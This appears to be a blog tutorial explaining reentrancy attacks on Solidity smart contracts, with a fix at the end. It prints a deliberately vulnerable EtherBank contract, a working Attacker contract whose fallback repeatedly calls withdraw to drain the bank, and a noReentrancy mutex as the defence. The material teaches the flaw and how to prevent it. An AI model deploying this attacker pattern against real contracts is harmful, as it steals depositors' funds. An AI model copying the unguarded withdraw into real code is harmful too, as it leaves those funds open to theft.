Reentrancy — a vulnerability that causes your Solidity smart contract to be withdrawn all money
What is Reentrancy attack?
Suppose we have 2 contracts: A and B. Contract A calls contract B. The basic idea of Reentrancy attack is the contract B can call back into contract A while contract A is still executing.
For example, contract A has 100 Ether, the contract B has 0 Ether. In contract A, we have recorded the balance number for each address was deposited. Specifically, in this example, contract A records the balance of contract B is 1 Ether.
Contract A also has a withdraw function for depositors can get back money which deposited before.
The contract is OK if the caller is a wallet address (not a contract address). Example: John had deposited 1 Ether before to smart contract, and John wants to withdraw it today:
The contract will check John's balance is greater than 0 or not. If the balance is greater than 0, the contract will send Ether to John's wallet.
After contract A sends Ether to Join’s wallet, it will reset John’s balance record is 0:
It looks fine. But, with Solidity, we can use a smart contract to call another smart contract. For example, we will use contract B to exploit contract A. The key of contract B that we will use the fallback function feature of Solidity.
Step 1: Contract B will call the withdrawal function of contract A.
Step 2: Contract A check balance is greater than 0 or not. If this condition is satisfied, contract A will send Ether to contract B and make the fallback function of contract B is executed:
Step 3: The fallback function of contract B calls the withdraw function of contract A while the balance value of B is recorded by A is still greater than 0:
Step 4: Contract A will send Ether to contract B again.
Repeat much time, the contract B will withdraw all money of contract A:
Smart contract:
Firstly, we create a contract named EtherBank. It is Contract A in the above example.
Note that, this code works when we use Solidity version ^0.6.0 or ^0.7.0.
pragma solidity ^0.7.0;contract EtherBank {
uint public total = 0;
mapping(address => uint) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
total += msg.value;
}
function withdraw(uint _amount) public {
require(balances[msg.sender] >= _amount , "Out of amount");
(bool sent, ) = msg.sender.call{value: _amount}("");
require(sent, "Failed to send Ether");
balances[msg.sender] -= _amount;
total -= _amount;
}
function getBalance() public view returns(uint) {
return balances[msg.sender];
}
}
Secondly, we create another contract named Attacker. It is Contract B in the above example.
pragma solidity ^0.7.0;import './EtherBank.sol';contract Attacker {
EtherBank public etherBank;
constructor(address _etherBankAddress) public {
etherBank = EtherBank(_etherBankAddress);
}
fallback() external payable {
if(address(etherBank).balance >= 1 ether){
etherBank.withdraw(1 ether);
}
}
function attack() public payable {
require(msg.value >= 1 ether);
etherBank.deposit{ value: 1 ether}();
etherBank.withdraw(1 ether);
}
function getBalance() public view returns(uint) {
return address(this).balance;
}
}
Call the attack function with 1 ether.
How to prevent Reentrancy:
To prevent Reentrancy, we will declare a modifier named noReentrancy:
pragma solidity ^0.7.0;contract EtherBank {
uint public total = 0;
mapping(address => uint) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
total += msg.value;
}
bool internal locked;
modifier noReentrancy() {
require(!locked , 'No reentrancy');
locked = true;
_;
locked = false;
}
function withdraw(uint _amount) public noReentrancy {
require(balances[msg.sender] >= _amount , "Out of amount");
(bool sent, ) = msg.sender.call{value: _amount}("");
require(sent, "Failed to send Ether");
balances[msg.sender] -= _amount;
total -= _amount;
}
function getBalance() public view returns(uint) {
return balances[msg.sender];
}
}
We will use a bool variable: locked. The magic is _; sentence. _; means continue executing the function (in this case is withdraw function).
